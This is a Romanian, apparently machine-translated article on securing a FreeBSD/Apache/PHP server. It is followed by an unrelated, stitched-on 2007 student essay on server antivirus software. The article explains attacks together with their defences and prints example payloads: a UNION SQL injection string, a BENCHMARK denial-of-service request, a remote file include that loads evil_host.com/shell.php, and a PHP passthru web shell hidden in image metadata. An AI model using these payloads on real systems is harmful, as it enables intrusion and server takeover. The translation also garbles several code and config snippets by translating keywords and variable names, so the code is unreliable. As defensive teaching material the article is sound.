  Acum, după ce ați stăpânit FreeBSD, când câteva comenzi descarcă surse noi pentru nucleul gratuit și întregul sistem, apoi câteva comenzi creează o lume și un nucleu nouă și apoi actualizează porturile și aplicațiile din sistem, începeți să înțelegeți puterea sistemelor * nix. Este greu să transmiți mândria pe care o simți atunci când upgradezi un server FreeBSD de la o ramură veche la cea actuală, reconstruiești lumea sistemului, când sistemul se compilează singur din surse noi (se pare că Munchausen și-a smuls părul de păr) și tot ceea ce a funcționat înainte de actualizare funcționează și „fără fișier”.

  După cum ați înțeles deja, trebuie să vă abonați la listele de corespondență de securitate de la dezvoltatorii software-ului care vă sprijină afacerea și să fiți actualizat periodic. Reînnoirea a tot și a totul trebuie perfecționată și pusă pe șine.

• Reglaj de securitate. Majoritatea sistemelor de operare pentru server nu vin suficient configurate, implicit, pentru a funcționa în mediul dur „chimic” al Internetului. Pentru ca hackerii să „nu trișeze” pe serverul dvs., trebuie să efectuați reglarea securității, și anume, să citiți recomandările producătorului sistemului de operare privind securitatea. Administratorii sistemelor *nix pot apela la securitatea omului și, după ce citesc sfaturile dezvoltatorilor, pot face ca basmul să devină realitate. Dar indiferent de sistemul de operare, trebuie să testați cu atenție funcționarea serverului și a serviciilor după reglarea securității.
• firewall. Un firewall configurat pe care l-ați verificat personal folosind scanere de porturi nmap și scanere de vulnerabilități, dacă există o ieșire din aceste programe, înțelegeți cu toții ce este în joc? Când configurați un firewall, rețineți că există modalități de a ocoli regulile acestuia. De exemplu, există o rețea locală protejată de un firewall, prin setarea flagului de prohibiție a fragmentării pachetelor, este posibil, în anumite situații, să se ajungă la destinație în rețeaua locală. Sau o greșeală comună a administratorului, încredere excesivă în pachetele de ieșire ale propriului său server.

  Imaginați-vă o situație reală, codul inamic încearcă să inițieze o conexiune la gazda proprietarului hackerului și aveți o regulă în firewall „totul este permis de la mine la Internet”. Când compuneți reguli de firewall, trebuie să înțelegeți pe deplin imaginea de ansamblu a comunicării în rețea a serviciilor dvs. între ei și clienții la distanță.

• Sistem de detectare a intruziunilor. Firewall poate fi imaginat ca ziduri de piatră lângă castelul unui cavaler. Ridicat o dată și așezați în interior - uscat și confortabil. Dar dacă cineva testează deja rezistența zidurilor de la tun? Poate că deja trebuie să te uiți în afara castelului și să te strângi pe cineva? Pentru a ști ce se întâmplă în spatele zidurilor castelului, cei de afară, trebuie să ai un sistem de detectare a intruziunilor (IDS) pe server. Dacă aveți un astfel de sistem bazat pe pachetul care vă place, atunci dacă cineva începe să tragă din pistolul nmap, atunci veți fi conștient, iar atacatorul va fi, de asemenea, conștient de „ceea ce știți”.
• Analiza situatiilor nestandardizate. În numeroase jurnalele din sistem, inscripțiile „eroare: fișierul nu se deschide /etc/passwd” sau „acces refuzat” clipesc adesea. Sunt niște clopote mici care sună despre o aplicație configurată incorect care nu poate citi ceva, undeva, sau poate nu este un clopoțel, ci o alarmă care sună un semnal de alarmă despre un hacker care se află la jumătatea drumului.

  În orice caz, administratorul ar trebui să fie conștient de astfel de lucruri. Pentru a facilita munca administratorului, au fost create programe care vor analiza jurnalele pentru apariția unor fraze interesante și vor trimite un raport administratorului prin poștă. Nu disprețuiți o astfel de oportunitate, astfel de programe sunt comparabile cu paznicii care verifică o cale de încredere, dar toți se comportă așa cum este prescris?

• Eliminați versiunile de software. Eliminați bannerele din serviciile dvs. Nu, nu acele bannere pe care le afișați pe site-ul dvs., ci acele rânduri pe care programele dvs. le transmit în salutări la conectare sau la ieșire de eroare. Nu este nevoie să strălucești cu versiunile programelor tale, hackerii caută pe internet programe disponibile care exploatează cutare sau cutare vulnerabilitate (exploits - exploit) după versiuni.

  Nu există o soluție unică aici, de exemplu, dacă instalați un anumit program din porturi, atunci nu scrieți make install clean, așa că fără tine totul va fi descărcat, compilat și instalat. Mai bine faceți aducerea; face extract; apoi mergi la subdirectorul de fișiere și acolo poți corecta versiunea programului din surse sau o dai drept alta și apoi poți face doar instalarea curată.

  Apache este foarte informativ deplasat și încă strălucește cu versiunile de sistem, PHP, Perl, OpenSSL. Rușinea este dezactivată prin specificarea directivelor în httpd.conf ServerSignature Off ServerTokens Prod. Pe Internet, puteți găsi ajutor pentru înlocuirea bannerelor cu orice program. Scopul este același - de a priva atacatorul de informații valoroase. Privind lista de servicii disponibile de pe Internet, întreabă-te dacă oferă prea multe informații despre sine și despre informațiile pe care le stochează.

  De exemplu, legătura cu serverul DNS poate permite „transferul de zonă”, iar computerele dumneavoastră cu IP-ul și numele de domeniu vor fi disponibile pentru toată lumea, ceea ce este rău. Verificați-vă serverul cu diverse scanere și citiți cu atenție rezultatele acestora. Când înlocuiți bannerul programului, vă sfătuiesc să introduceți nu text aleatoriu, ci un avertisment despre responsabilitate și că acțiunile sunt înregistrate. Din moment ce au fost incidente când un hacker a fost eliberat în sala de judecată, pentru că pe serverul FTP piratat era inscripția „Bine ați venit! Bine ați venit!”.

• Regula cerinței minime. Minimizați serviciile disponibile pentru Internet. Dezactivați ceea ce nu aveți nevoie, deoarece nu puteți pirata ceea ce este dezactivat. O greșeală comună, de exemplu, este atunci când un server MySQL asociat cu Apache pe aceeași mașină este configurat să fie accesibil de la distanță pe portul implicit 3306. De ce? Dați comanda netstat -na | grep ASCULȚI și dați-vă răspunsul: știți ce programe folosesc ce interfață și ce port? Ești în control? Ei bine, dacă da.
• Multe parole puternice și diferite. Adesea, în videoclipurile despre hacking sau în poveștile hackerilor despre hacking, expresia „e bine că administratorul a avut o singură parolă pentru panoul de administrare, care a ajuns și la ssh și ftp”. Sper că nu este vorba despre tine. De aici și regula: parolele pentru diferite servicii trebuie să fie diferite și să aibă cel puțin 16 caractere. Lasă-le să fie notate pe o foaie de hârtie dacă ți-e frică să uiți (în acest loc mă omoară specialiștii în securitate), dar asta este mai bine decât parola ta să fie decriptată în câteva minute de un atacator de la distanță, deoarece parola este mică și similar cu cuvânt de dicționar permis să facă asta.

  Diferitele parole pentru diferite servicii sunt ușor de făcut dacă serviciile vor autoriza nu ca utilizatori de sistem în baza de date /etc/passwd, ci ca virtuale în propriile baze de date plane sau DBMS. Nu stocați parolele pe servere în fișierul password.txt pentru toate resursele la care aveți acces, în calitate de administrator.

• Prescripţie. Toate serviciile dvs. de pe server trebuie să ruleze din diferite conturi limitate (cont) și să nu ruleze niciodată din contul root. Crede-mă, dacă ajung să privilegieze escaladarea de la un cont limitat la starea rădăcină (uid=0, gid=0), vei fi salvat de absența unor găuri cunoscute în sistemul tău actualizat.

  Apropo, mulți administratori uită așa ceva, de ce, de exemplu, conturile pentru rularea Apache și MySQL ar trebui să aibă acces la shell! La urma urmei, acest lucru poate fi dezactivat și, în loc de shell, specificați / bin / false. Ei bine, sincer, verifică-ți conturile pentru programe de pe serverul tău de raportare și spune-mi dacă greșesc. În bazele de date SQL, limitați conturile la privilegiile minime necesare. Nu acordați privilegii FILE atunci când este apelat doar SELECT.

• Toată lumea la închisoare! Aflați cum să lucrați cu sandbox-uri (sandbox) sau închisori (închisoare) și să rulați aplicații în aceste camere izolate, acest lucru va face dificilă piratarea întregului server. Dacă utilizați virtualizarea, atunci puteți distribui serviciile pe diferite sisteme de operare pentru oaspeți.
• Apărare stratificată. Este posibil să interziceți ceva în mai multe moduri în locuri diferite - faceți-o. NU te gândi NICIODATĂ - am interzis-o aici, acolo să interzic superfluul.

Aflați mai multe despre atacurile asupra serviciilor vulnerabile și asupra serverului însuși.

• Atac DoS (Denial of Service) - un atac al cărui scop este să blocheze orice resursă limitată a serverului (canal de Internet, RAM, procesor etc., etc.), astfel încât serverul să nu poată servi utilizatorii legitimi. Figurat vorbind, imaginați-vă că un intrus v-a sunat acasă și a tăcut la telefon, iar asta a durat toată seara. Te-ai săturat de toate astea și ai închis telefonul, iar dimineața ai aflat că ai ratat un apel important de la șeful tău. Iată o analogie reală pentru un atac DoS.

  În viața reală, DoS arată adesea așa, din cauza unui bug în program, utilizarea procesorului sare și rămâne mult timp la 100%, iar atacatorul exploatează periodic această gaură din program. O aplicație scrisă prost poate rămâne fără memorie RAM. Sau o „bombă de e-mail” sub forma unui fișier puternic comprimat în arhivă cu multe caractere [spațiu], care va fi despachetat pentru verificare de către antivirus, iar fișierul imens dezambalat va depăși partiția hard disk-ului de pe server și / și determină repornirea serverului.

  Protecție împotriva atacurilor DoS:

  • Actualizarea unui program care este manipulat pentru un atac DoS
  • Setați cote de resurse pentru contul în care rulează acest program. *sistemele nix vă permit să ajustați procentul de utilizare a CPU, RAM, numărul de procese generate, fișiere deschise etc. etc.
  • Configurați autentificarea în program și încercați să găsiți atacatorul-păpușar și să-l blocați în firewall.
  • Configurați programul conform recomandărilor dezvoltatorului, guru, conform articolelor de pe Internet, dacă vă aflați într-o astfel de situație.
• DDoS (același DoS, dar ești atacat de mai multe computere zombie, conduse de
  atacator). DDoS este distructiv și sunt folosiți doar de acei vandali care au turme de mașini zombi și vor cere bani pentru a opri atacul sau a vă deteriora afacerea, astfel încât utilizatorii, fără să ajungă la serverul dvs., să meargă la un concurent. Atacurile DDoS nu sunt folosite de hackeri al căror scop este să-ți pirateze intelectual serverul, da, da, serverul tău este un „mister” pe care vor să-l „rezolve”.

  Cum să te protejezi de DDoS? Dacă vă bazați pe propriile forțe și mijloace, atunci, prin automatizarea activității scripturilor, puteți extrage adrese IP din diferite jurnale și le puteți introduce în regulile de interzicere a firewall-ului. Deci, de exemplu, a făcut autorul articolului „Există viață sub DDoS?” din revista Hacker. Blocați rețelele atacatorilor în firewall, daunele DDoS pot fi reduse dacă citiți articole despre configurarea programelor dvs. și urmați aceste instrucțiuni. multe articole. despre cum să-l configurați pentru a minimiza daunele DDoS.

  Protecție împotriva atacurilor DDoS:

  • Dacă DDoS este direcționat către aplicație, încercați să găsiți în jurnale diferența dintre atacatori și utilizatorii legitimi și, automatizând cu un script, introduceți-l în regulile firewall în deny
  • Dacă DDoS este direcționat către sistem (de exemplu, un atac asupra protocolului ICMP), prin automatizarea cu un script, adăugați-l la regulile firewall în deny
  • Setați cote de resurse pentru contul în care rulează acest program. * sistemele nix vă permit să configurați procentul de utilizare a CPU, RAM, numărul de procese generate, fișiere deschise etc.
  • Configurați programul conform recomandărilor dezvoltatorului, guru, conform articolelor de pe Internet, dacă vă aflați într-o astfel de situație
  • Contactați furnizorul dvs. din amonte pentru a vă ajuta în orice mod. Scrieți o plângere către [email protected] host_of_networks_from_attack.domain. Acest lucru va ajuta la distrugerea parțială a rețelei atacatorului, îl va lăsa să sufere daune, îl costă bani. Experimentează satisfacția morală.
  • Verificați mod_security pentru Apache, este un instrument grozav care vă ajută în anumite situații.
• Atacul cu parola Bruteforce. Aici găurile din programe nu sunt de vină, ei doar selectează aproximativ o pereche de autentificare / parolă. Cei care au părăsit serverul cu ssh configurat, dar au uitat să restricționeze accesul prin ssh de la anumite IP-uri și cu anumite autentificări (directiva în ssh_config AllowUser), trebuie să fi văzut în jurnalele încercări de a forța brut parola mash: mash_password.

  Protecție prin parolă Bruteforce:

  • Limitați numărul de încercări nereușite de conectare/parolă
  • Dacă aplicația permite, atunci configurați o creștere a timpului înainte de o nouă încercare de conectare/parolă.
  • Dacă aplicația ar trebui să funcționeze cerc îngust oameni, creați o astfel de regulă și restricționați-o

Atacă prin conținutul dinamic al serviciului

Acest tip de atac apare adesea pe o mulțime de Apache + (PHP | PERL) + (MySQL | PostgreSQL) pentru lumea *nix și IIS + ASP + Microsoft SQL Server pentru lumea MS Windows folosind un browser simplu, dar acest lucru este doar un caz special, care este folosit mai des datorită popularității web-ului. În acest pachet, limbajele de programare sunt ASP, PHP, Perl, SQL, așa că vor fi adesea folosite de hackeri pentru a-și compila proiectele distructive.

DAR cel mai important lucru de înțeles este că astfel de ligamente serviciu + conținut dinamic pe deasupra lor există multe în limbaje de programare și, prin urmare, toate sunt sub pistolul hackerilor. De exemplu, iată o listă incompletă:

• Server web + scripturi CGI
• O legătură străveche care nu mai este folosită - scripturi Apache + PHF (și anume P H F).
• Server de aplicații IIS + ColdFusion
• Mecanism SSI (partea serverului include)

În continuare, vom vorbi mai ales despre hack-uri web, dar nu uitați că tot ceea ce este descris mai jos este valabil pentru alte pachete de servicii + conținut dinamic. Cuvintele sunt diferite, dar esența este aceeași. Astăzi, hackerii atacă web-ul cu browser-ul, mâine cu clientul R împotriva serviciului Z. Serverul web, el însuși conectat la baze de date și la numeroase limbaje de programare, a devenit o platformă pentru atacuri de acest gen.

Semnificația tuturor atacurilor de acest fel este de a încerca să examineze site-ul folosind un browser pentru a găsi erori în scripturile care servesc conținutul (conținutul) dinamic al site-ului.

De aici și concluzia – piratarea unui site printr-un atac pe web, pe care există doar pagini html statice care se referă doar una la alta, este IMPOSIBIL. Atacurile prin intermediul site-ului dvs. Web au apărut atunci când oamenii au dorit mai multă interactivitate și au adăugat-o prin limbaje de programare și baze de date.

Hackerii care navighează pe site acordă o atenție deosebită scripturilor cărora li se trece orice parametru. Dar ce se întâmplă dacă autorul scriptului nu verifică ce anume este transmis ca valoare a parametrului?

Soluții generale pentru administrator de atacuri asupra conținutului dinamic al serviciului (site-ul web ca caz special)

• Actualizați. Am vorbit deja despre acest lucru, dar dacă utilizați dezvoltări terțe (motoare de forumuri, galerii, chat-uri etc.), atunci veți primi rapoarte despre vulnerabilități și găuri de corecție. Părerea hackerilor este că, dacă portalul funcționează cu finanțele și cifra de afaceri a acestora, atunci nu este de dorit ca un astfel de portal să aibă evoluții ale altcuiva, cu excepția propriei lor. Desigur, se înțelege că dezvoltarea propriilor motoare pentru site a fost scrisă de programatori care știu să programeze în siguranță și au o înțelegere a amenințărilor de pe Internet.
• Fii non-standard. În multe utilitare pentru hackeri, bazele de date cu vulnerabilități, forumul/, galeria/, imaginile/ căile deseori clipesc. Foarte confortabil! Cunoașteți administratorul, jumătate dintre ei se vor rade și scuipa pe site-ul dvs. atunci când site-ul dvs. nu este localizat la /usr/www, iar administratorul dvs. nu este site.com/admin. Concluzia este că, dacă nu sunteți standard, atunci aceasta este o spiță suplimentară în roțile unui hacker care vă atacă site-ul. El va trebui să adauge/corecteze în baza de date manuală/script. Dar este un hacker întotdeauna capabil sau dispus să o facă? Tinerii hackeri „copiii de scenariu” vor fi cu siguranță speriați. De exemplu, sfaturi de securitate PHP

  # Faceți codul PHP să arate ca alte tipuri de cod
  Aplicație AddType/x-httpd-php .asp .py .pl
  # Faceți codul PHP să arate ca niște coduri de tip necunoscut
  Aplicație AddType/x-httpd-php .bop .foo .133t
  # Faceți codul PHP să arate ca html
  Aplicație AddType/x-httpd-php .html .htm
  

  Această formă de securitate pentru PHP prin ascundere are puține dezavantaje la un cost mic. Hackerii înșiși, descriindu-și hack-urile, scriu că descarcă același software care se află pe serverul tău de pe site-ul dezvoltatorului și se uită la ce nume de tabel / căi / cutare sau acel motor funcționează implicit. Sensul general al non-standard este de a întârzia procesul de hacking, astfel încât hackerul să nu aibă o „blitzkrieg”, și cu cât trage mai mult, cu atât este mai probabil să fie detectat.

• Eliminați versiunile de motoare și scripturi de pe site. Aceasta este o informație valoroasă de care atacatorul ar trebui să fie privat, știind versiunea pe care o caută pentru soluții gata făcute pentru hacking. Asigurați-vă că scripturile dvs. nu imprimă informații utile despre erori, cum ar fi: calea către scriptul în care a apărut eroarea (problema „dezvăluirea căii”) și rezultatul real al erorii.
• Luați în considerare necesitatea .htaccess. Prezența fișierelor .htaccess înseamnă că vă puteți suprascrie opțiunile setate în configurația principală Apache, credeți-mă, hackerii vor face exact asta. Dacă dezactivați utilizarea .htaccess cu directiva „AllowOverride None”, atunci veți obține un beneficiu de performanță pentru Apache, deoarece nu va căuta prin toate directoarele de pe calea către pagina web la fiecare cerere și va crește securitatea serverul web Apache.

Mai multe despre atacurile asupra conținutului dinamic (site-ul web ca caz special)

• XSS (Cross Site Scripting).
  Cross-site scripting se numește XSS, nu CSS, deoarece CSS este un acronim timpuriu pentru „Cascading Style Sheets”. Atacurile XSS nu sunt îndreptate împotriva serverului, ci împotriva utilizatorilor acelui server. Dar administratorul nu trebuie să se bucure! Atacul XSS arată așa, site-ul are câmpuri editabile pe pagina web sau parametri de script care nu sunt filtrați pe construcția formularului<, >, javascript.

  Hackerul adaugă cod în limbajul de programare la nivelul clientului, de obicei Java și VBScript, la câmpurile editabile, iar acest cod devine parte a paginii HTML. Când un utilizator vizitează o astfel de pagină, browserul său analizează pagina și execută acest cod.
  Ce fac hackerii cu XSS?

  • Furtul de cookie-uri (cookie-uri, chifle) – aceste fișiere text stochează informații pe care serverul le „pune” utilizatorului pentru identificarea lui ulterioară. În exemplu, dacă creați un fișier test.html cu acest conținut (scrieți-l singur), atunci când rulați într-un browser, va scoate XSS.
    Stimate administrator, am avut o eroare la vizitarea site-ului
    Ajutor

    Dar puteți scrie un script în Java și mai serios. De obicei, astfel de scripturi sunt scrise pe webmail-ul administratorului și, folosind inginerie socială, încearcă să-l faci să citească mesajul pentru a-și obține cookie-urile.

    Dacă cookie-urile nu sunt legate de adresa IP și măsuri suplimentare protecție, își înlocuiesc cookie-urile cu cookie-uri admin și încearcă să intre în panoul de administrare, care nu verifică login-ul și parola și identifică oamenii doar prin cookie-uri.

  • Site deface (deface - înlocuirea paginii de start a site-ului, cel mai adesea index.html)
  • Troianizarea unui utilizator de la distanță. Sunt selectate exploatații noi pentru browserele utilizatorilor și atunci când aceștia intră într-o pagină vulnerabilă, se încearcă infectarea computerului cu un troian. Dacă utilizatorul are instalat un antivirus cu baze de date proaspete, atunci va indica apariția unui troian în sistem. Și site-ul tău va cădea în ochii utilizatorului, poate că nu va mai veni la tine.
  • DoS. La în număr mare vizitatori, scriptul va solicita suplimentar alte pagini de pe serverul dvs. sau de la altul, cineva poate fi DoS.

  Soluție pentru problemă:

  • Pentru a bloca scrierea etichetelor html în baza de date din câmpurile de intrare, utilizați constructe precum htmlspecialchars pentru PHP, care va înlocui< на <, >la >, și la și și așa mai departe
    Exemplu,

    $comment = htmlspecialchars($comment, ENT_QUOTES);
    $query = "inserați în cartea de oaspeți
    (nume, locație, e-mail, url, comentariu) valori
    ("$nume", "$locație", "$email", "$url", "$comentar"";
    mysql_query($query) sau die(mysql_error());

  • Verificați și filtrați în scripturile dvs. toți parametrii pe care utilizatorul îi introduce și sunt trecuți în script prin bara de adrese. Aflați cum să utilizați corect expresiile regulate pentru a analiza datele primite. Pentru limbajul dvs. de programare, găsiți material care vă învață cum să codificați în siguranță.
  • Dacă doriți să utilizați cookie-uri pe site-ul dvs. web, vă rugăm să consultați metode sigure lucrează cu cookie-uri. Limitați-le acțiunile în timp și prin adrese IP.
  • Ca administrator, fii vigilent atunci când ești înșelat de inginerie socială. Nu uitați de securitatea computerului personal din spatele computerului dvs. client.
• injecție SQL. injecție SQL.
  Această boală înseamnă că un parametru neverificat este înlocuit în interogarea SQL care apare în script. Scripturi care suferă de găsări de hackeri cu injecție SQL într-un mod simplu, valoarea parametrului este furnizată cu o cotă site.com/view.php?id=1" sau parametrul numeric este modificat ca acest site.com/view.php?id=2-1.

  Dacă citatul înlocuit provoacă o „eroare” (o mulțime de mesaje că o astfel de cerere nu este executată într-un astfel de script de-a lungul unei astfel de căi), atunci un astfel de script este un candidat pentru a-l pompa mai departe. Adesea, atacatorii folosesc hack-ul Google, cerând motorului de căutare ceva de genul „site-ul: www.victim.ru Avertisment”. Motorul de căutare Google va returna scripturi incorecte pe site-ul dvs., atât de vechi încât au fost de mult indexate de păianjenul Google. .

  Cod care nu verifică valoarea și suferă de injectare SQL

  $id = $_REQUEST[„id”];
  $rezultat = mysql_query("SELECT titlu, text, datenews, autor FROM `news` WHERE `id`="$id"");
  

  Acum imaginați-vă că în loc de un număr, veți fi înlocuit cu „-1 union select null/*” (fără ghilimele) și apoi interogarea dvs. se va transforma în

  SELECTAȚI titlul, textul, data știrilor, autorul FROM `news` WHERE `id`="-1 union select null/*"
  

  Adică, hackerul dorește ca cererea lui să fie executată în plus față de solicitarea dvs., combinată cu a dvs. folosind directiva sindicală. Și atunci hackerul va încerca să facă alte interogări și, având în vedere puterea limbajului SQL, acest lucru nu este de bun augur pentru administrator. De la deface (deface - înlocuirea paginii de start a site-ului) până la obținerea drepturilor de root pe serverul dumneavoastră. Un hacker poate de asemenea să efectueze un atac DoS datorită injecției SQL: site.com/getnews.php?id=BENCHMARK(10000000,BENCHMARK(10000000, md5(current_date))) câteva astfel de solicitări și serverul este la 100% CPU încărcă mult timp.

  Protecție prin injecție SQL:

  • Utilizați pe scară largă caracteristicile SQL Server, cum ar fi vizualizările și procedurile stocate. Acest lucru va limita accesul neautorizat la baza de date.
  • Înainte de a trece un parametru la cerere, acesta trebuie verificat pentru tipul (pentru PHP - is_bool(), is_float(), is_int(), is_string(), is_object(), is_array() și is_integer()) și, cel puțin , citat folosind constructul de tip addslashes pentru PHP.
  • Toate scripturile funcționează cu baza de date dintr-un cont de bază de date, eliminați toate privilegiile din acest cont care nu sunt necesare pentru lucru. Deseori hackerii folosesc comanda MySQL (MySQL este luat ca exemplu, acest lucru se aplică oricărui server SQL) „ÎNCĂRCARE DATE INFILE” pentru a citi fișierele de care au nevoie de pe server și contul care poate fi citit sub care rulează MySQL. De aici concluzia, dezactivați privilegiile inutile pentru scripturile dvs., cum ar fi FILE, care sunt necesare pentru a utiliza comanda LOAD DATA INFILE. Principiul „minimului de bază” ar trebui luat ca bază.
  • Sistemică Cont, de pe care rulează serverul SQL, nu ar trebui să aibă acces la paginile site-ului și la fișierele de sistem ale serverului.
• Conectarea fișierelor. Includeți fișierul. Să presupunem că există o pagină site.com/getnews.php?file=190607, dar autorul scriptului, folosind include, conectează pagina fără verificări.

  $fișier = $_REQUEST[„fișier”];
  include($fișier.".html");
  

  Hackerul, în loc de 190607, va înlocui evil_host.com/shell.php și apoi întreaga bară de adrese a browserului hackerului va arăta ca acest site.com/postnews.php?file=evil_host.com/shell.php și hackerul va avea propriul său shell web pe site-ul dvs. cu drepturile pe care le are Apache.

  Protecția conexiunii fișierelor:

  • Verificați și filtrați în scripturile dvs. toți parametrii pe care utilizatorul îi introduce și sunt trecuți în script prin bara de adrese. Pentru limbajul dvs. de programare, găsiți material care vă învață cum să codificați în siguranță.
  • Hackerilor le place foarte mult când limbajul de programare de pe site vă permite să rulați comenzi de sistem. Prin urmare, trebuie să interziceți apelarea unor astfel de funcții în limbajul dvs. de programare, dacă, desigur, acest lucru este posibil. De exemplu, în setările PHP este posibil să specificați o listă de funcții „interzise” folosind disable_functions în php.ini.
• Poza troiană
  Dacă aveți posibilitatea de a încărca fișiere pe serverul de pe site, fiți pregătit să încărcați, de exemplu, imagini cu avatar. Într-o imagine în format JPEG, există conceptul de metadate (amintiți-vă unde camera scrie informații când fotografiați un cadru) și aceste metadate vor fi scrise

  ";passthru($_GET["cmd"]);echo ""; ?>
  

  imaginea va fi redenumită avatara.jpg.php pentru a ocoli majoritatea verificărilor de extensie și va folosi site.com/upload_images/avatara.jpg.php?cmd=server_commands

  Protecție troiană:

  • Verificați corect extensia fișierului. Chiar dacă procesați corect fișierele permise, fiți pregătiți ca imaginea din jpg în php să fie redenumită folosind o altă vulnerabilitate de pe site-ul dvs. Verificați metadate într-o imagine cu funcții precum exif_read_data() în PHP.
  • Preveniți execuția limbajelor de programare în directoarele de imagini prin intermediul serverului dvs. web. Pentru a face acest lucru, căutați în liniile de configurare Apache precum „AddType application/x-httpd-”, care asociază limbajele de programare cu extensii de fișiere și interzic execuția lor în directoare cu imagini. Pentru Apache, interzicerea execuției fișierelor limbaj PHP va fi o construcție

    
    Comanda refuza, permite
    Negați de la toți
    

  • Pentru limbajul dvs. de programare, găsiți material care vă învață cum să codificați în siguranță atunci când procesați imagini și le încărcați corect pe server.

Mulțumiri personale:

• prietenul Alexander Pupyshev alias lynx pentru critici și sfaturi
• site antichat.ru/
• www.xakep.ru/
• carte de Michael Eben, Brian Taiman. FreeBSD Administration: Arta echilibrării
• carte de Joel Scambray, Stuart McClure, George Kurtz. Secretele hackerilor: Securitatea rețelei - soluții gata făcute. A doua editie

Alte surse de informații de protecție:

• Pagina de manual de securitate manuală FreeBSD conține o descriere a problemelor obișnuite de securitate și a bunelor practici de administrare.
• Abonați-vă la listele de corespondență freebsd-security @ freebsd.org. Pentru a face acest lucru, trimiteți un e-mail la majordomo @ freebsd.org cu subscribe freebsd-security în corpul mesajului. Pe această listă de corespondență sunt discutate cele mai presante probleme de securitate.
• Pagina de informații de securitate FreeBSD freebsd.org/security/
• Document de instrucțiuni de securitate FreeBSD
• Site-ul web CERT.org conține informații despre vulnerabilități în protecția tuturor sistemelor de operare.
• Firewalls & Internet Security de William R. Cheswick și Steven M. Bellowin
• Construirea de paravane de protecție pentru internet, ediția a doua de Brent Chapman și Elizabeth Zwicky

Rezultat:
Sper că articolul v-a ajutat să vedeți toate problemele împreună, acum administratorul trebuie să citească despre securitatea computerului, baze de date, servere web, limbaje de programare din surse suplimentare. Rezumând articolul pe scurt, trebuie să fiți la curent cu știrile despre eliberarea problemelor de securitate, să actualizați și să verificați toate datele de intrare pentru corectitudine în evoluțiile dvs.
Fie ca forța să fie cu tine!

Universitatea de Stat ChitaInstitutul de EnergieFacultatea de Economie si InformaticaDepartamentul de Informatica Aplicata si Matematica Rezumat pe subiect: Utilizator PC pe tema: Software antivirus pentru servere Completat: Art. gr. PI-07-1 Zlova V.V. Verificat: art. profesor cafenea Pimmonic I.P. Chita, 2007 Conţinut

Introducere. 3

1 Servere de fișiere ca una dintre sursele de distribuție a virușilor. cinci

2 Software antivirus pentru servere LAN. cinci

3 Software antivirus pentru servere de mail. 8

4 Kaspersky Anti-Virus. unsprezece

Concluzie. 17

Lista literaturii folosite.. 18

Introducere Virușii informatici sunt una dintre cele mai periculoase amenințări la adresa securității informațiilor în prezent. Un virus de computer este un program special scris care se poate atașa spontan la alte programe, se poate crea copii și le poate încorpora în fișiere, zone ale sistemului informatic și rețele de calculatoare pentru a perturba programe, corup fișiere și directoare și pentru a crea tot felul de interferențe. în lucrul la calculator.

Securitatea informației este înțeleasă ca protecția informațiilor și a infrastructurii care le susține împotriva oricăror influențe accidentale sau rău intenționate, al căror rezultat poate fi deteriorarea informațiilor în sine, a proprietarilor acesteia sau a infrastructurii suport. Sarcinile de securitate a informațiilor sunt reduse la minimizarea daunelor, precum și la anticiparea și prevenirea unor astfel de impacturi.

Pentru majoritatea organizațiilor, protejarea resurselor de rețea împotriva accesului neautorizat devine una dintre cele mai stringente probleme. De o preocupare deosebită este faptul că Internetul este acum utilizat pe scară largă pentru a transporta și stoca diverse date și informații confidențiale ale companiei.

Sarcina de a proteja informațiile este relevantă în special pentru proprietarii de baze de date de informații online, editorii de reviste electronice etc.

Până în prezent, multe programe antivirus au fost create pentru a lupta împotriva virușilor.Un program antivirus (antivirus) este inițial un program pentru detectarea și tratarea programelor infectate cu un virus informatic, precum și pentru prevenirea infectării unui fișier de către un virus (de exemplu, prin vaccinare). Multe antivirusuri moderne vă permit, de asemenea, să detectați și să eliminați troieni și alte programe rău intenționate. Software-ul antivirus constă din programe de calculator care încearcă să detecteze, să prevină și să elimine virușii de computer și alte programe rău intenționate. Software-ul antivirus vă ajută să vă protejați computerul de viruși, viermi, troieni și alte programe rău intenționate care se pot bloca în timpul funcționării computerului. În prezent, serverele de fișiere și de e-mail sunt instrumentul principal pentru gestionarea datelor. Stocarea, schimbul și transmiterea datelor sunt sarcinile principale în acest management, dar sunt imposibile fără acces ușor la informații, integrarea datelor și stabilitatea sistemului. Serverul de fișiere este una dintre cele mai vulnerabile resurse de rețea. În cazul unei infecții sau a unei defecțiuni, accesul la alte resurse de rețea poate fi restricționat. Un fișier infectat poate duce la infectarea unei cantități mari de date, pierderea integrării datelor și defecțiunea sistemului. Astfel de riscuri sunt motivul cost ridicat produse pentru gestionarea serverelor și a resurselor de rețea. Serverele de fișiere „publice” și conferințele electronice sunt una dintre principalele surse de distribuție a virușilor. Aproape în fiecare săptămână apare un mesaj că un utilizator și-a infectat computerul cu un virus care a fost preluat de pe un server BBS, ftp sau de la o conferință electronică. În acest caz, fișierele infectate sunt adesea „plasate” de către autorul virusului pe mai multe BBS/ftp sau trimise la mai multe conferințe în același timp, iar aceste fișiere sunt deghizate în versiuni noi ale unor software (uneori - sub versiuni noi de antivirusuri ). În cazul unei distribuții în masă a unui virus către serverele de fișiere ftp/BBS, mii de computere pot fi afectate aproape simultan, dar în majoritatea cazurilor sunt „puse” viruși DOS sau Windows, a căror rată de răspândire în condiții moderne este mult mai mică. decât macrovirusurile. Din acest motiv, astfel de incidente nu se termină aproape niciodată în epidemii de masă, ceea ce nu se poate spune despre macroviruși. 2 Software antivirus pentru servere LAN Problemele unei protecții antivirus eficiente sunt de actualitate astăzi mai mult ca niciodată atât în ​​sectorul corporativ, cât și în rândul utilizatorilor privați, totuși, spre deosebire de aceștia din urmă, problemele și sarcinile cu care se confruntă companiile sunt mult mai grave și necesită soluții de un alt nivel. Administratorii sistemelor informatice corporative trebuie să instaleze instrumente antivirus, să le configureze și să stabilească politici de actualizare și să se asigure că antivirusurile sunt activate în mod constant pe sute sau chiar mii de mașini - și de multe ori acest lucru trebuie făcut manual. Rețelele locale sunt una dintre principalele surse de distribuție a virusului. Dacă nu luați măsurile de protecție necesare, atunci o stație de lucru infectată, la intrarea în rețea, infectează unul sau mai multe fișiere de serviciu de pe server (în cazul Novell NetWare - LOGIN.COM). A doua zi, utilizatorii lansează fișiere infectate atunci când se conectează la rețea. În locul fișierului de serviciu LOGIN.COM pot acționa și diverse programe software instalate pe server, documente șablon standard sau foi de calcul Excel utilizate în companie.

